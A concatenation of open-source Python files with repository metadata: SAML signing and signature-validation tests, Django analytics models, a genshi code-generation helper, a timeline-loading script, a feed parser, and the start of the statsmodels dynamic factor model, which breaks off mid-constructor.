self.assertIn('<ds:SignatureValue>', xml_authn_signed_3)
res_3 = parseString(xml_authn_signed_3)
ds_signature_3 = res_3.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_3.tagName)
xml_authn_etree = etree.fromstring(xml_authn)
xml_authn_signed_4 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_etree, key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_4)
res_4 = parseString(xml_authn_signed_4)
ds_signature_4 = res_4.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_4.tagName)
xml_authn_signed_5 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_etree, key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_5)
res_5 = parseString(xml_authn_signed_5)
ds_signature_5 = res_5.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_5.tagName)
xml_logout_req = b64decode(self.file_contents(join(self.data_path, 'logout_requests', 'logout_request.xml.base64')))
xml_logout_req_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_logout_req, key, cert))
self.assertIn('<ds:SignatureValue>', xml_logout_req_signed)
res_6 = parseString(xml_logout_req_signed)
ds_signature_6 = res_6.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_6.tagName)
xml_logout_res = b64decode(self.file_contents(join(self.data_path, 'logout_responses', 'logout_response.xml.base64')))
xml_logout_res_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_logout_res, key, cert))
self.assertIn('<ds:SignatureValue>', xml_logout_res_signed)
res_7 = parseString(xml_logout_res_signed)
ds_signature_7 = res_7.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_7.tagName)
xml_metadata = self.file_contents(join(self.data_path, 'metadata', 'metadata_settings1.xml'))
xml_metadata_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_metadata, key, cert))
self.assertIn('<ds:SignatureValue>', xml_metadata_signed)
res_8 = parseString(xml_metadata_signed)
ds_signature_8 = res_8.firstChild.firstChild.nextSibling.firstChild.nextSibling
self.assertIn('ds:Signature', ds_signature_8.tagName)
def testValidateSign(self):
"""
Tests the validate_sign method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
idp_data = settings.get_idp_data()
cert = idp_data['x509cert']
settings_2 = OneLogin_Saml2_Settings(self.loadSettingsJSON('settings2.json'))
idp_data2 = settings_2.get_idp_data()
cert_2 = idp_data2['x509cert']
fingerprint_2 = OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert_2)
fingerprint_2_256 = OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert_2, 'sha256')
try:
self.assertFalse(OneLogin_Saml2_Utils.validate_sign('', cert))
except Exception as e:
self.assertEqual('Empty string supplied as input', str(e))
# expired cert
xml_metadata_signed = self.file_contents(join(self.data_path, 'metadata', 'signed_metadata_settings1.xml'))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed, cert, validatecert=True))
xml_metadata_signed_2 = self.file_contents(join(self.data_path, 'metadata', 'signed_metadata_settings2.xml'))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed_2, None, fingerprint_2))
xml_response_msg_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_message_response.xml.base64')))
# expired cert
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert, validatecert=True))
# modified cert
other_cert_path = join(dirname(__file__), '..', '..', '..', 'certs')
f = open(other_cert_path + '/certificate1', 'r')
cert_x = f.read()
f.close()
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert_x))
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert_x, validatecert=True))
xml_response_msg_signed_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_message_response2.xml.base64')))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, None, fingerprint_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, None, fingerprint_2, 'sha1'))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, None, fingerprint_2_256, 'sha256'))
xml_response_assert_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_assertion_response.xml.base64')))
# expired cert
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed, cert, validatecert=True))
xml_response_assert_signed_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_assertion_response2.xml.base64')))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed_2, None, fingerprint_2))
xml_response_double_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'double_signed_response.xml.base64')))
# expired cert
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed, cert, validatecert=True))
xml_response_double_signed_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'double_signed_response2.xml.base64')))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed_2, None, fingerprint_2))
dom = parseString(xml_response_msg_signed_2)
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(dom.toxml(), cert_2))
dom.firstChild.firstChild.firstChild.nodeValue = 'https://idp.example.com/simplesaml/saml2/idp/metadata.php'
dom.firstChild.getAttributeNode('ID').nodeValue = u'_34fg27g212d63k1f923845324475802ac0fc24530b'
# Reference validation failed
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(dom.toxml(), cert_2))
invalid_fingerprint = 'afe71c34ef740bc87434be13a2263d31271da1f9'
# Wrong fingerprint
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed_2, None, invalid_fingerprint))
dom_2 = parseString(xml_response_double_signed_2)
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(dom_2.toxml(), cert_2))
dom_2.firstChild.firstChild.firstChild.nodeValue = 'https://example.com/other-idp'
# Modified message
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(dom_2.toxml(), cert_2))
dom_3 = parseString(xml_response_double_signed_2)
assert_elem_3 = dom_3.firstChild.firstChild.nextSibling.nextSibling.nextSibling
assert_elem_3.setAttributeNS(OneLogin_Saml2_Constants.NS_SAML, 'xmlns:saml', OneLogin_Saml2_Constants.NS_SAML)
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(assert_elem_3.toxml(), cert_2))
no_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_signature.xml.base64')))
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(no_signed, cert))
no_key = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_key.xml.base64')))
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(no_key, cert))
|
pitbulk/python3-saml
|
tests/src/OneLogin/saml2_tests/utils_test.py
|
Python
|
bsd-3-clause
| 40,950
|
# -*- coding: utf-8 -*-
"""
analytics.models
Models for Demand and Supply data
:copyright: (c) 2013 by Openlabs Technologies & Consulting (P) Limited
:license: see LICENSE for more details.
"""
import operator
from django.db import models
import django.contrib.admin
from admin.models import Occupation, Institution, Company, SubSector
__all__ = ['DEGREE_CHOICES', 'REGION_CHOICES', 'State', 'City', 'SupplyBase',
'DemandData', 'CompanyYearData', 'DiversityRatioLevel',
'DiversityRatioSubsector', 'GenderDiversity', 'ITSpend',
'RevenueSubsector', 'RevenueOccupation', 'RevenueTotal',
'TalentSaturation']
DEGREE_CHOICES = (
('UG', 'Undergraduate Degree'),
('PG', 'Postgraduate Degree'),
('DOC', 'Ph.D/M.Phil'),
('PSD', 'Post School Diploma'),
('PGD', 'Post Graduate Diploma'),
('UNK', 'Unknown'),
)
REGION_CHOICES = (
('NORTH', 'North'),
('SOUTH', 'South'),
('EAST', 'East'),
('WEST', 'West'),
('CENTRAL', 'Central'),
)
class State(models.Model):
"""
States
"""
name = models.CharField(max_length=50, default=None, unique=True)
region = models.CharField(max_length=12, choices=REGION_CHOICES)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('name', 'region',)
def __unicode__(self):
"""
Returns object display name
"""
return self.name
class City(models.Model):
"""
Cities
"""
name = models.CharField(max_length=50, default=None)
state = models.ForeignKey('State')
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('name', 'state',)
verbose_name_plural = 'Cities'
def __unicode__(self):
"""
Returns object display name
"""
return "%s,%s" % (self.name, self.state)
class SupplyBase(models.Model):
"""
Demand supply data
"""
year = models.IntegerField()
city = models.ForeignKey('City')
occupation = models.ForeignKey(Occupation)
institution = models.ForeignKey(Institution)
degree = models.CharField(max_length=3, choices=DEGREE_CHOICES,
default=None)
supply = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'city', 'occupation', 'institution',
'degree',)
verbose_name_plural = 'SupplyBase'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s,%s" % (self.year, self.city, self.occupation,)
class DemandData(models.Model):
"""
Demand data
"""
year = models.IntegerField()
city = models.ForeignKey('City')
occupation = models.ForeignKey(Occupation)
company = models.ForeignKey(Company)
demand = models.IntegerField()
headcount = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'city', 'occupation', 'company',)
verbose_name_plural = 'DemandBase'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s,%s" % (self.year, self.city, self.occupation,)
class CompanyYearData(models.Model):
"""
Revenue, Headcount data for companies annually
"""
year = models.IntegerField()
company = models.ForeignKey(Company)
revenue = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'company', )
verbose_name_plural = 'Company Annual Data'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.company, )
class DiversityRatioLevel(models.Model):
"""
Diversity ratio for levels
"""
year = models.IntegerField(unique=True)
male_leadership = models.IntegerField(
verbose_name='Percent Male in Leadership roles'
)
male_entry = models.IntegerField(
verbose_name='Percent Male in Entry Level roles'
)
male_middle = models.IntegerField(
verbose_name='Percent Male in Middle Level roles'
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
@property
def female_leadership(self):
"Percent Females in leadership level roles"
return 100 - self.male_leadership
@property
def female_entry(self):
"Percent Females in entry level roles"
return 100 - self.male_entry
@property
def female_middle(self):
"Percent Females in middle level roles"
return 100 - self.male_middle
class Meta:
verbose_name_plural = 'Diversity Ratio for Experience Levels'
def __unicode__(self):
"""
Returns object display name
"""
return "%d" % (self.year, )
class DiversityRatioSubsector(models.Model):
"""
Diversity ratio for subsector
"""
year = models.IntegerField()
subsector = models.ForeignKey(SubSector, verbose_name='Sub-sector')
male = models.IntegerField(verbose_name='Percent males in subsector')
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
@property
def female(self):
"Percent Females in subsector"
return 100 - self.male
class Meta:
unique_together = ('year', 'subsector', )
verbose_name_plural = 'Diversity Ratio for Subsector'
def __unicode__(self):
"""
Returns object display name
"""
return "%d, %s" % (self.year, self.subsector, )
class GenderDiversity(models.Model):
"""
Gender diversity as per course
"""
year = models.IntegerField()
category = models.CharField(max_length=60)
male = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'category', )
verbose_name_plural = 'Gender Diversity'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.category, )
class ITSpend(models.Model):
"""
IT Spend data
"""
year = models.IntegerField()
sub_sector = models.ForeignKey(SubSector, verbose_name='Sub-sector')
world_spend = models.IntegerField(verbose_name='World IT Spend')
india_revenue = models.IntegerField(verbose_name='Indian IT Revenue')
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'sub_sector', )
verbose_name_plural = 'IT Spend'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.sub_sector, )
class RevenueSubsector(models.Model):
"""
Revenue per subsector
"""
year = models.IntegerField()
sub_sector = models.ForeignKey(SubSector)
revenue = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'sub_sector', )
verbose_name_plural = 'Revenue by Subsector'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.sub_sector, )
class RevenueOccupation(models.Model):
"""
Revenue by occupation
"""
year = models.IntegerField()
occupation = models.ForeignKey(Occupation)
revenue = models.IntegerField()
cagr_next_7_years = models.IntegerField(
verbose_name='CAGR % for next 7 years'
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'occupation', )
verbose_name_plural = 'Revenue by occupation'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.occupation, )
@property
def revenue_after_7year(self):
return int(self.revenue * (1 + self.cagr_next_7_years / 100.0) ** 7)
class RevenueTotal(models.Model):
"""
Total revenue
"""
year = models.IntegerField(unique=True)
revenue = models.IntegerField()
most_likely_growth = models.IntegerField(
verbose_name='Most likely growth percent',
blank=True,
null=True
)
optimistic_growth = models.IntegerField(
verbose_name='Optimisitc growth percent',
blank=True,
null=True
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
verbose_name_plural = 'Total Revenues'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%d" % (self.year, self.revenue, )
@property
def growth_series(self):
"""
Return growth and most likely series
"""
resultset = RevenueTotal.objects.filter(year__lte=self.year)
optimistic_series = []
most_likely_series = []
years = []
for result in resultset:
most_likely_series.append(result.revenue)
optimistic_series.append(result.revenue)
years.append(result.year)
for i in range(7):
optimistic_series.append(
int(optimistic_series[-1] *
(1 + self.optimistic_growth / 100.0))
)
most_likely_series.append(
int(most_likely_series[-1] *
(1 + self.most_likely_growth / 100.0))
)
years.append(years[-1] + 1)
return {
'years': years,
'optimistic_series': optimistic_series,
'most_likely_series': most_likely_series,
}
class TalentSaturation(models.Model):
"""
Model for talent saturation
We are keeping headcount because we sum from other models is not equal
to the one in worksheet. Perhaps due to lack of data from all
companies.
"""
year = models.IntegerField(unique=True)
headcount = models.IntegerField()
attrition_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="Annual Attrition (%)",
default=5.0,
)
cagr_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="CAGR (%)",
default=8.6
)
fresher_hiring_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="Fresher Hiring (%)",
default=95.0
)
need_for_experience_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="Need for > 2 years experienced (% of headcount)",
default=45.0
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
verbose_name_plural = 'Talent Saturation'
def __unicode__(self):
"""
Returns object display name
"""
return "%d" % (self.year, )
@property
def quitters(self):
return int(self.headcount * self.attrition_pc / 100)
def series(self):
"Return talent saturation series"
years = []
records = TalentSaturation.objects.filter(year__lte=self.year) \
.order_by('year')
headcounts = [record.headcount for record in records]
years = [record.year for record in records] + \
range(self.year + 1, self.year + 8)
for i in range(7):
headcounts.append(int(headcounts[-1] * (1 + self.cagr_pc / 100)))
# difference between headcounts
hirings = map(
operator.sub, headcounts, [headcounts[0]] + headcounts[:-1],
)
quitters = [record.quitters for record in records]
for i in range(7):
quitters.append(int(quitters[-1] * (1 + self.cagr_pc / 100)))
gross_hiring = map(operator.add, quitters, hirings)
fresher_pcs = [record.fresher_hiring_pc for record in records] + \
[self.fresher_hiring_pc] * 7
fresher_hiring = map(
lambda g, f: int(g * f / 100),
gross_hiring, fresher_pcs
)
experience_need = map(
lambda record: int(
record.headcount * record.need_for_experience_pc / 100
),
records
)
experience_need += map(
lambda x: int(x * self.need_for_experience_pc / 100),
headcounts[-7:]
)
demand = map(
operator.sub,
experience_need, [experience_need[0]] + experience_need[:-1],
)
potential_supply = map(
lambda x: int(x * (self.fresher_hiring_pc / 100) ** 2),
[0, 0] + fresher_hiring[:-2]
)
return {
'years': years[3:],
'demand': demand[3:],
'potential_supply': potential_supply[3:],
}
django.contrib.admin.site.register(State)
django.contrib.admin.site.register(City)
django.contrib.admin.site.register(SupplyBase)
django.contrib.admin.site.register(DemandData)
django.contrib.admin.site.register(CompanyYearData)
django.contrib.admin.site.register(DiversityRatioLevel)
django.contrib.admin.site.register(DiversityRatioSubsector)
django.contrib.admin.site.register(GenderDiversity)
django.contrib.admin.site.register(ITSpend)
django.contrib.admin.site.register(RevenueSubsector)
django.contrib.admin.site.register(RevenueOccupation)
django.contrib.admin.site.register(RevenueTotal)
django.contrib.admin.site.register(TalentSaturation)
|
arpitprogressive/arpittest
|
apps/analytics/models.py
|
Python
|
bsd-3-clause
| 14,238
|
# Copyright (c) 2010, Florian Ludwig <dino@phidev.org>
# see LICENSE
"""Helpers for code generation based on genshi [0]
There are good code generator tools out there like cog [1].
But if you already use genshi in your project this module might
help you integrating code generation into your build and
deploy process using familar templating syntax.
If you're not using genshi you probably want to look at cog
and similar tools.
[0] http://genshi.edgewall.org/
[1] http://nedbatchelder.com/code/cog/
"""
import os
import StringIO
import copy
import logging
from genshi.template import TemplateLoader, MarkupTemplate, NewTextTemplate
import genshi.template.loader
class ActionscriptTemplate(NewTextTemplate):
"""Template for langauges with /* ... */ commments
Should work for JavaScript, Action Script, c,..."""
def __init__(self, *args, **kwargs):
kwargs['delims'] = ('/*%', '%*/', '/*###', '###*/')
NewTextTemplate.__init__(self, *args, **kwargs)
class ShellStyleTemplate(NewTextTemplate):
"""Template for languages with # commentars"""
def __init__(self, *args, **kwargs):
kwargs['delims'] = ('#%', '%#', '##*', '*##')
NewTextTemplate.__init__(self, *args, **kwargs)
def get_template(fpath):
"""returns template class for given filename"""
if fpath.endswith('.css') or fpath.endswith('.as') or fpath.endswith('.js'):
return ActionscriptTemplate
elif fpath.endswith('.py') or fpath.endswith('.wsgi'):
return ShellStyleTemplate
elif fpath.endswith('.mxml'):
return MarkupTemplate
else:
logging.warn('WARNING: don\'t know the file type of "%s"' % fpath)
return NewTextTemplate
def numbered_file(fpath, mode='r'):
"""Add filenumbers to every line as comment
Returns filelike object
"""
_fileobj = open(fpath, mode)
tmpl_cls = get_template(fpath)
if tmpl_cls == ActionscriptTemplate:
comment_start = '/*'
comment_end = '*/'
last_symbole = ';'
elif tmpl_cls == MarkupTemplate:
comment_start = '<!--'
comment_end = '-->'
last_symbole = '>'
else:
print 'WARNING: no line numbers for "%s"' % fpath
return _fileobj
data = []
in_comment = False
in_hidden_comment = False
for number, line in enumerate(_fileobj.readlines()):
line = line = line.rstrip()
if not in_comment and comment_start in line:
in_comment = True
s = line.find(comment_start) + len(comment_start)
if line[s:].lstrip().startswith('!'):
in_hidden_comment = True
if in_comment and comment_end in line:
in_comment = False
in_hidden_comment = False
if not line.endswith(last_symbole):
data.append(line)
continue
if in_comment:
line += comment_end
if line.rstrip().endswith('\\'):
# if the lines ends with a \ we might destroy the template syntax
continue
count_line = line.replace('\t', ' ')
white = 83 - len(count_line) if len(count_line) < 78 else 3
comment = comment_start + ' Line: %i ' + comment_end
if in_comment:
comment += comment_start
if in_hidden_comment:
comment += '!'
data.append(line
+ white*' '
+ (comment % (number+1)))
return StringIO.StringIO('\n'.join(data))
# monkey patch template loader
genshi.template.loader.open = numbered_file
class Handler(object):
"""Common handler for templates"""
def __init__(self, path, default_args={}):
if not isinstance(path, list):
path = [path]
self.loader = TemplateLoader(path)
self.default_args = default_args
def gen(self, src, dst, local_args={}):
print src, '->',
tmpl = self.loader.load(src, cls=get_template(src))
args = copy.copy(self.default_args)
args.update(local_args)
stream = tmpl.generate(**args)
print dst
data = stream.render()
# make sure we only touch file if we would change it
dst_data = open(dst).read() if os.path.exists(dst) else ''
if dst_data != data:
open(dst, 'w').write(data)
|
FlorianLudwig/python-yawp
|
yawp/template.py
|
Python
|
bsd-3-clause
| 4,325
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
import json
import bson.json_util as bju
import emission.core.get_database as edb
import argparse
import emission.core.wrapper.user as ecwu
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("timeline_filename",
help="the name of the file that contains the json representation of the timeline")
parser.add_argument("user_email",
help="specify the user email to load the data as")
parser.add_argument("-r", "--retain", action="store_true",
help="specify whether the entries should overwrite existing ones (default) or create new ones")
parser.add_argument("-v", "--verbose", type=int,
help="after how many lines we should print a status message.")
args = parser.parse_args()
fn = args.timeline_filename
print(fn)
print("Loading file " + fn)
tsdb = edb.get_timeseries_db()
user = ecwu.User.register(args.user_email)
override_uuid = user.uuid
print("After registration, %s -> %s" % (args.user_email, override_uuid))
entries = json.load(open(fn), object_hook = bju.object_hook)
for i, entry in enumerate(entries):
entry["user_id"] = override_uuid
if not args.retain:
del entry["_id"]
if args.verbose is not None and i % args.verbose == 0:
print("About to save %s" % entry)
tsdb.save(entry)
|
sunil07t/e-mission-server
|
bin/debug/load_timeline_for_day_and_user.py
|
Python
|
bsd-3-clause
| 1,612
|
def extractSpearpointtranslationsHomeBlog(item):
'''
Parser for 'spearpointtranslations.home.blog'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('Record of the Missing Sect Master', 'Record of the Missing Sect Master', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractSpearpointtranslationsHomeBlog.py
|
Python
|
bsd-3-clause
| 692
|
"""
Dynamic factor model
Author: Chad Fulton
License: Simplified-BSD
"""
from __future__ import division, absolute_import, print_function
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import numpy as np
import pandas as pd
from .kalman_filter import KalmanFilter, FilterResults
from .mlemodel import MLEModel, MLEResults, MLEResultsWrapper
from .tools import (
companion_matrix, diff, is_invertible,
constrain_stationary_univariate, unconstrain_stationary_univariate,
constrain_stationary_multivariate, unconstrain_stationary_multivariate
)
from scipy.linalg import solve_discrete_lyapunov
from statsmodels.multivariate.pca import PCA
from statsmodels.regression.linear_model import OLS
from statsmodels.tsa.vector_ar.var_model import VAR
from statsmodels.tools.tools import Bunch
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.tsatools import lagmat
from statsmodels.tools.decorators import cache_readonly
from statsmodels.tools.sm_exceptions import ValueWarning
import statsmodels.base.wrapper as wrap
class DynamicFactor(MLEModel):
r"""
Dynamic factor model
Parameters
----------
endog : array_like
The observed time-series process :math:`y`
exog : array_like, optional
Array of exogenous regressors for the observation equation, shaped
nobs x k_exog.
k_factors : int
The number of unobserved factors.
factor_order : int
The order of the vector autoregression followed by the factors.
error_cov_type : {'scalar', 'diagonal', 'unstructured'}, optional
The structure of the covariance matrix of the observation error term,
where "unstructured" puts no restrictions on the matrix, "diagonal"
requires it to be any diagonal matrix (uncorrelated errors), and
"scalar" requires it to be a scalar times the identity matrix. Default
is "diagonal".
error_order : int, optional
The order of the vector autoregression followed by the observation
error component. Default is None, corresponding to white noise errors.
error_var : boolean, optional
Whether or not to model the errors jointly via a vector autoregression,
rather than as individual autoregressions. Has no effect unless
`error_order` is set. Default is False.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
**kwargs
Keyword arguments may be used to provide default values for state space
matrices or for Kalman filtering options. See `Representation`, and
`KalmanFilter` for more details.
Attributes
----------
exog : array_like, optional
Array of exogenous regressors for the observation equation, shaped
nobs x k_exog.
k_factors : int
The number of unobserved factors.
factor_order : int
The order of the vector autoregression followed by the factors.
error_cov_type : {'diagonal', 'unstructured'}
The structure of the covariance matrix of the error term, where
"unstructured" puts no restrictions on the matrix and "diagonal"
requires it to be a diagonal matrix (uncorrelated errors).
error_order : int
The order of the vector autoregression followed by the observation
error component.
error_var : boolean
Whether or not to model the errors jointly via a vector autoregression,
rather than as individual autoregressions. Has no effect unless
`error_order` is set.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
Notes
-----
The dynamic factor model considered here is in the so-called static form,
and is specified:
.. math::
y_t & = \Lambda f_t + B x_t + u_t \\
f_t & = A_1 f_{t-1} + \dots + A_p f_{t-p} + \eta_t \\
u_t & = C_1 u_{t-1} + \dots + C_1 f_{t-q} + \varepsilon_t
where there are `k_endog` observed series and `k_factors` unobserved
factors. Thus :math:`y_t` is a `k_endog` x 1 vector and :math:`f_t` is a
`k_factors` x 1 vector.
:math:`x_t` are optional exogenous vectors, shaped `k_exog` x 1.
:math:`\eta_t` and :math:`\varepsilon_t` are white noise error terms. In
order to identify the factors, :math:`Var(\eta_t) = I`. Denote
:math:`Var(\varepsilon_t) \equiv \Sigma`.
Options related to the unobserved factors:
- `k_factors`: this is the dimension of the vector :math:`f_t`, above.
To exclude factors completely, set `k_factors = 0`.
- `factor_order`: this is the number of lags to include in the factor
evolution equation, and corresponds to :math:`p`, above. To have static
factors, set `factor_order = 0`.
Options related to the observation error term :math:`u_t`:
- `error_order`: the number of lags to include in the error evolution
equation; corresponds to :math:`q`, above. To have white noise errors,
set `error_order = 0` (this is the default).
- `error_cov_type`: this controls the form of the covariance matrix
:math:`\Sigma`. If it is "dscalar", then :math:`\Sigma = \sigma^2 I`. If
it is "diagonal", then
:math:`\Sigma = \text{diag}(\sigma_1^2, \dots, \sigma_n^2)`. If it is
"unstructured", then :math:`\Sigma` is any valid variance / covariance
matrix (i.e. symmetric and positive definite).
- `error_var`: this controls whether or not the errors evolve jointly
according to a VAR(q), or individually according to separate AR(q)
processes. In terms of the formulation above, if `error_var = False`,
then the matrices :math:C_i` are diagonal, otherwise they are general
VAR matrices.
References
----------
.. [1] Lutkepohl, Helmut. 2007.
New Introduction to Multiple Time Series Analysis.
Berlin: Springer.
"""
def __init__(self, endog, k_factors, factor_order, exog=None,
error_order=0, error_var=False, error_cov_type='diagonal',
enforce_stationarity=True, **kwargs):
# Model properties
self.enforce_stationarity = enforce_stationarity
# Factor-related properties
self.k_factors = k_factors
self.factor_order = factor_order
# Error-related properties
self.error_order = error_order
self.error_var = error_var and error_order > 0
self.error_cov_type = error_cov_type
# Exogenous data
self.k_exog = 0
if exog is not None:
exog_is_using_pandas = _is_using_pandas(exog, None)
if not exog_is_using_pandas:
exog = np.asarray(exog)
# Make sure we have 2-dimensional array
if exog.ndim == 1:
if not exog_is_using_pandas:
exog = exog[:, None]
else:
exog = pd.DataFrame(exog)
self.k_exog = exog.shape[1]
# Note: at some point in the future might add state regression, as in
# SARIMAX.
self.mle_regression = self.k_exog > 0
# We need to have an array or pandas at this point
if not _is_using_pandas(endog, None):
endog = np.asanyarray(endog, order='C')
# Save some useful model orders, internally used
k_endog = endog.shape[1] if endog.ndim > 1 else 1
self._factor_order = max(1, self.factor_order) * self.k_factors
self._error_order = self.error_order * k_endog
# Calculate the number of states
k_states = self._factor_order
k_posdef = self.k_factors
if self.error_order > 0:
k_states += self._error_order
k_posdef += k_endog
if k_states == 0:
k_states = 1
k_posdef = 1
# Test for non-multivariate endog
if k_endog < 2:
raise ValueError('The dynamic factors model is only valid for'
' multivariate time series.')
# Test for too many factors
if self.k_factors >= k_endog:
raise ValueError('Number of factors must be less than the number'
' of endogenous variables.')
# Test for invalid error_cov_type
if self.error_cov_type not in ['scalar', 'diagonal', 'unstructured']:
raise ValueError('Invalid error covariance matrix type'
' specification.')
# By default, initialize as stationary
kwargs.setdefault('initialization', 'stationary')
# Initialize the state space model
super(DynamicFactor, self).__init__(
endog, exog=exog, k_states=k_states, k_posdef=k_posdef, **kwargs
)
# Initialize the components
self.parameters = OrderedDict()
self._initialize_loadings()
self._initialize_exog()
self._initialize_error_cov()
self._initialize_factor_transition()
self._initialize_error_transition()
self.k_params = sum(self.parameters.values())
# Cache parameter vector slices
def _slice(key, offset):
length = self.parameters[key]
param_slice = np.s_[offset:offset + length]
offset += length
return param_slice, offset
offset = 0
self._params_loadings, offset = _slice('factor_loadings', offset)
self._params_exog, offset = _slice('exog', offset)
self._params_error_cov, offset = _slice('error_cov', offset)
